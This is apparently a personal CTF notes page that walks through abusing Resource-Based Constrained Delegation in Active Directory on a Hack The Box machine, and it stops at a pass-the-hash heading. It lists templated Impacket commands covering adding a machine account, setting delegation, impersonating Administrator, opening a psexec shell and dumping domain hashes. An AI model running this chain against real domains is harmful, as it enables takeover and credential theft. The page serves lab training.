rootđź’€senseicat:~#
Hack. Eat. Sleep. Repeat!!!
Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham
AD attacks-:
Abuse Resource-Based Constrained Delegation to Gain Unauthorized Access
- In Resource-Based Constrained Delegation (RBCD), we configure the target resource e.g. a database or file server to specify which service accounts are permitted to access it on behalf of users. For example, a database service can be set up to allow specific services, like a web service, to act on behalf of users through assigned security permissions.
- This differs from unconstrained and constrained delegation. With unconstrained delegation, service accounts with delegation enabled can access any resource on behalf of users. Similarly, with constrained delegation, service accounts with delegation enabled can access a specific list of resources.
- Requirement-:
BCD is configured by setting the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
This attribute specifies which service accounts or systems are permitted to act on behalf of users to access the target resource.
-To exploit this type of delegation, an attacker must gain access to an account with Write permissions on the targeted resource (computer object), such as GenericAll, GenericWrite, and WriteDACL.
- User
SUPPORT@SUPPORT.HTBwhich the user I owned before is a member of a group calledSHARED SUPPORT ACCOUNTS@SUPPORT.HTB. The group itself have full control to a computer called DC.SUPPORT.HTB, so in other words user SUPPORT have full control to DC.SUPPORT.HTB including write permission.
- Exploiting with rbcd tool
- Impacket tool
[AddCOmputer]Syntax to add a computer-:
addcomputer.py -computer-name 'password' -computer-pass 'password' -dc-ip [ip] '[domain]/[username]:[password]'
- Then, we use the RBCD python script to add our new computer to the msds-allowedtoactonbehalfofotheridentity attribute list.RBCD tool
- Syntax-:
python3 rbcd.py 10.10.11.174 -u [domain]\\[user] -p '[password]' -t DC -f [newly created computer]
- Now, we have what it needs to request a service ticket; we will use the getST.py script from impacket instead of Rubeus to request the service ticket as administrator.
python3 getST.py -spn cifs/[object with unconstrained delegation over] -impersonate [user] -dc-ip [ip] '[domain]/[user]:[password]'
- When the ticket is issued, we can use by setting it to variable
KRB5CCNAMEforimpacket-psexec.
Syntax-:
KRB5CCNAME=[ccache file name [endswith .ccache] impacket-psexec [domain]/[user]@[object] -k -no-pass
- Dumping the hashes with impacket-secretsdump-:
- You can set the
KRB5CCNAMEas an environmental variableexport KRB5CCNAME=$(pwd)/administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache - Syntax-:
impacket-secretsdump -k -target-ip [ip] [domain name]
- Pass the hash with Evil-winrm -: